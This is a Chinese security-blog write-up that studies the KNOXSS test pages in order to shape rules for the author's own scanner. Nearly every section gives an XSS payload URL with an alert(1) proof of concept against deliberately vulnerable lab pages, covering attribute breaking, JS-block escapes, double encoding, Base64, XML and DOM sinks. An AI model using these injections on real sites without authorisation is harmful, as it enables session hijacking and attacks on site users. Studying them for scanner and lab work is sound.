历史记录

    清空历史记录
    • 相关的动态
    • 相关的文章
    • 相关的用户
    • 相关的圈子
    • 相关的话题
    注册 登录
    初探 knoxss 扫描规则
    xq17 安全工具 13508浏览 · 2019-03-11 01:20

    初探 knoxss 扫描规则

    0x0 前言

    ​ knoxss在twitter经常看见,但是了解不是很深,不过碰巧看见了那个knoxss的发的测试页面,又碰巧自己最近在写扫描器,于是打算通过这个页面来参考下扫描规则。本文没有深入,只是基于题型设计构造出了payload,可能不符合题目的用意,欢迎师傅斧正。

    0x1 Source-Based XSS Test Cases

    0x1 Single Reflection

    0x1 case 01 Direct URL Injection (no parameter)

    ​ 地址:Case 01 - Direct URL Injection (no parameter)

    ​ 这个是个post类型的xss,value处可注入代码

    ​ 选择一个框填入即可:"/><scripr>alert(1);</script>

    0x2 Simple HTML Injection (a)

    ​ a参数可直接插入语句

    ​ 地址:Case 02 - Simple HTML Injection (a)

    ​ payload:https://brutelogic.com.br/xss.php?a=%3Cscript%3Ealert(1)%3C/script%3E

    0x3 Inline HTML Injection with Double Quotes

    ​ 地址:Case 03 - Inline HTML Injection with Double Quotes (b1)

    ​ payload:https://brutelogic.com.br/xss.php?b1=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

    0x4 Inline HTML Injection with Single Quotes

    ​ 地址:Case 04 - Inline HTML Injection with Single Quotes (b2)

    ​ payload:https://brutelogic.com.br/xss.php?b2=1%27%3E%3Cscript%3Ealert(1)%3C/script%3E

    0x5 Inline HTML Injection with Double Quotes: No Tag Breaking (b3)

    ​ 地址:Case 05 - Inline HTML Injection with Double Quotes: No Tag Breaking (b3)

    ​ payload:https://brutelogic.com.br/xss.php?b3=1%22%20onfocus=%22alert(1);%22%20autofocus%20a=%221

    0x6 Inline HTML Injection with Single Quotes: No Tag Breaking (b4)

    ​ 地址:Case 06 - Inline HTML Injection with Single Quotes: No Tag Breaking (b4)

    ​ payload:https://brutelogic.com.br/xss.php?b4=1%27%20onfocus=%27alert(1);%27%20autofocus%20a=%271

    0x7 HTML Injection with Single Quotes in JS Block (c1)

    ​ 这个payload很有意思的,涉及优先级和js作用域

    ​ 地址:Case 07 - HTML Injection with Single Quotes in JS Block (c1)

    ​ payload: https://brutelogic.com.br/xss.php?c1=1%3C/script%3E%3Cimg%20src=x%20onerror=%22alert(1)%22%3E

    0x8 HTML Injection with Double Quotes in JS Block (c2)

    ​ 地址:Case 08 - HTML Injection with Double Quotes in JS Block (c2)

    ​ payload:https://brutelogic.com.br/xss.php?c2=1%22%3C/script%3E%3Cimg%20src=x%20onerror=alert(1)%3E

    0x9 Simple JS Injection with Single Quotes (c3)

    ​ 地址:Case 09 - Simple JS Injection with Single Quotes (c3)

    ​ payload:https://brutelogic.com.br/xss.php?c3=1%27;alert(1);//

    0x10 Simple JS Injection with Double Quotes (c4)

    ​ 地址:Case 10 - Simple JS Injection with Double Quotes (c4)

    ​ Payload:https://brutelogic.com.br/xss.php?c4=1%22;alert(1);//

    0x11 Escaped JS Injection with Single Quotes (c5)

    ​ 地址:Case 11 - Escaped JS Injection with Single Quotes (c5)

    ​ Payload:https://brutelogic.com.br/xss.php?c5=1\%27;alert(1);//

    0x12 Escaped JS Injection with Double Quotes (c6)

    ​ 地址:Case 12 - Escaped JS Injection with Double Quotes (c6)

    ​ Payload:https://brutelogic.com.br/xss.php?c6=1\%22;alert(1);//

    0x13 Simple XML Injection (p)

    ​ 这个xml触发xss很有意思的一个payload。(这里我不是很理解,希望师傅能贴下相关链接给我学习下)

    ​ 地址:Case 13 - Simple XML Injection (p)

    ​ payload:https://brutelogic.com.br/xml.php?p=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert(1%3C/x:script%3E

    0x2 Multi Reflection (Pro Only)

    0x14 Double Injection in HTML Context with Double Quotes

    ​ 地址:Case 14 - Double Injection in HTML Context with Double Quotes

    ​ payload:http://brutelogic.com.br/multi/double-html.php?p=123%22%3E%3Cscript%3Ealert(1);%3C/script%3E

    0x15 Double Injection in Mixed Context (HTML + JS) with Default Quotes

    ​ 地址:Case 15 - Double Injection in Mixed Context (HTML + JS) with Default Quotes

    ​ payload:http://brutelogic.com.br/multi/double-mixed.php?p=1%27;alert(1);//%22%3E%3Cscript%3Ealert(1);%3C/script%3E

    0x16 Quoteless Inline Double Injection in JS variables

    ​ 地址:Case 16 - Quoteless Inline Double Injection in JS variables

    ​ payload:http://brutelogic.com.br/multi/js-inline.php?p=;alert(1);//\

    0x17 Quoteless Inline Double Injection in JS object

    ​ 地址:Case 17 - Quoteless Inline Double Injection in JS object

    ​ payload:http://brutelogic.com.br/multi/js-object.php?p=};alert(1);//\

    0x18 Quoteless Inline Double Injection in JS object with Nested Array

    ​ 地址:Case 18 - Quoteless Inline Double Injection in JS object with Nested Array

    ​ payload: http://brutelogic.com.br/multi/js-object2.php?p=}]};alert(1);//\

    0x19 Quoteless Inline Double Injection in JS object with Nested Function

    ​ 地址:Case 19 - Quoteless Inline Double Injection in JS object with Nested Function

    ​ Payload:http://brutelogic.com.br/multi/js-object3.php?p=;}}};alert(1);//\

    0x3 Special Cases (Pro Only)

    0x20 SQLi error-based HTML Injection *

    ​ 地址:Case 20 - SQLi error-based HTML Injection *

    ​ payload:http://testphp.vulnweb.com/listproducts.php?cat=1%27%3Cscript%3Ealert(1)%3C/script%3E

    0x21 PHP FILTER_VALIDATE_EMAIL Bypass HTML Injection

    ​ 地址:Case 21 - PHP FILTER_VALIDATE_EMAIL Bypass HTML Injection

    ​ Payload: http://brutelogic.com.br/tests/email.php?email=%22%3Cscript%3Ealert(1);%3C/script%3E%22@brutelogic.com.br

    0x22 Double-Encoded HTML Injection

    ​ 地址:Case 22 - Double-Encoded HTML Injection

    ​ Payload:http://brutelogic.com.br/tests/double-enc.php?p=%253cscript%253ealert(1)%253c%252fscript%253e

    0x23 Base64 HTML Injection

    ​ 地址:Case 23 - Base64 HTML Injection

    ​ Payload:http://brutelogic.com.br/tests/base64.php?p=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

    0x4 DOM-based XSS Test Cases

    0x24 DOM Injection via URL parameter (by server + client)

    ​ 地址:Case 24 - DOM Injection via URL parameter (by server + client)

    ​ Payload:http://brutelogic.com.br/dom/dom.php?p=%3Cimg%20src=x%20onerror=alert(1)%3E

    0x25 DOM Injection via URL Parameter (Document Sink)]

    ​ 地址:Case 25 - DOM Injection via URL Parameter (Document Sink)

    ​ Payload:http://brutelogic.com.br/dom/sinks.html?name=%3Cimg%20src=x%20onerror=alert(1)%3E

    0x26 DOM Injection via Open Redirection (Location Sink)

    ​ 地址:Case 26 - DOM Injection via Open Redirection (Location Sink)

    ​ Payload:http://brutelogic.com.br/dom/sinks.html?redir=javascript:alert(1)

    0x27 DOM Injection via URL Parameter (Execution Sink)

    ​ 地址:Case 27 - DOM Injection via URL Parameter (Execution Sink)

    ​ Payload:http://brutelogic.com.br/dom/sinks.html?index=%27NASDAQ%27;alert(1);

    0x5 Blind XSS Test Case

    0x1 Navigate to the following page and wait for KNOXSS message of "Nothing found for FORM"

    ​ 地址:Stored Text - Attacker's Input

    0x2 Open the victim's page simulating his/her access. An email with report will come to your inbox

    ​ 地址:Stored Text - Victim's Triggering

    ​ 这个分两步第一步先提交payload:<script>alert(1)</script>,然后第二步点击0x2的地址,这个我感觉扫描的情景比较庞大,暂时没想到怎么写扫码去处理这种情况。

    0x6 Authenticated XSS Test Case

    0x1 Authenticated XSS Test Case

    ​ 地址:XSS After Login

    ​ 这个就是登陆之后带cookie的xss,感觉没什么特殊的,带cookie去扫描就行了

    0x7 总结

    ​ 这个其实是knoxss的扫描工具的规则映射,可能内部会更加复杂,不过这些payload对于当前我这种菜鸟来说,效率是可以接受的,是值得去参考的。目前扫描器的主动扫描部分也确定了用scrapy来做爬虫然后进行规则扫描,目前对于sql注入的状态判断法很有兴趣,由于传统网站都会有waf,基于状态探测法能很好发现隐蔽的注入,目前扫描器还在继续开发中ing

    0x8 彩蛋

    ​ 分享下自用扫描器的ui

    0 人收藏 0 人喜欢 转载 分享
    2 条评论
    某人
    表情
    可输入 255
      发布投稿
    热门文章
    优秀作者
    目录
    先知社区
    本站/app由 Djingoii 提供技术和产品支持